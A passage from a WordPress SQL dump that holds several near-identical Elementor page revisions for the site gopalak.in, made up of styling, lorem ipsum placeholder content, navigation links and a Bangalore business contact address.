.elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:07:58','2022-09-21 09:37:58','',1373,'https://gopalak.in/?p=1417',0,'revision','',0),(1418,1,'2022-09-21 15:07:58','2022-09-21 09:37:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:07:58','2022-09-21 09:37:58','',1373,'https://gopalak.in/?p=1418',0,'revision','',0),(1419,1,'2022-09-21 15:07:58','2022-09-21 09:37:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:07:58','2022-09-21 09:37:58','',1373,'https://gopalak.in/?p=1419',0,'revision','',0),(1421,1,'2022-09-21 15:11:58','2022-09-21 09:41:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, </p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<h2>Add Your Heading Text Here</h2>		\n		<p><strong>Lorem Ipsum</strong> is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Know More\n					</a>\n			<h2>LATEST NEWS</h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg 150w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-320x320.jpg 320w, https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-100x100.jpg 100w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<p>Add Your Heading Text Here</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\nContact : (+91)7259272171<br>\nE-mail id: mango@homedirect.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-09-21 15:11:58','2022-09-21 09:41:58','',1373,'https://gopalak.in/?p=1421',0,'revision','',0),(1422,1,'2022-09-21 15:11:58','2022-09-21 09:41:58','<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Lorem Ipsum is simply dummy tex </h2>		\n			<style>/*! elementor - v3.7.6 - 15-09-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left 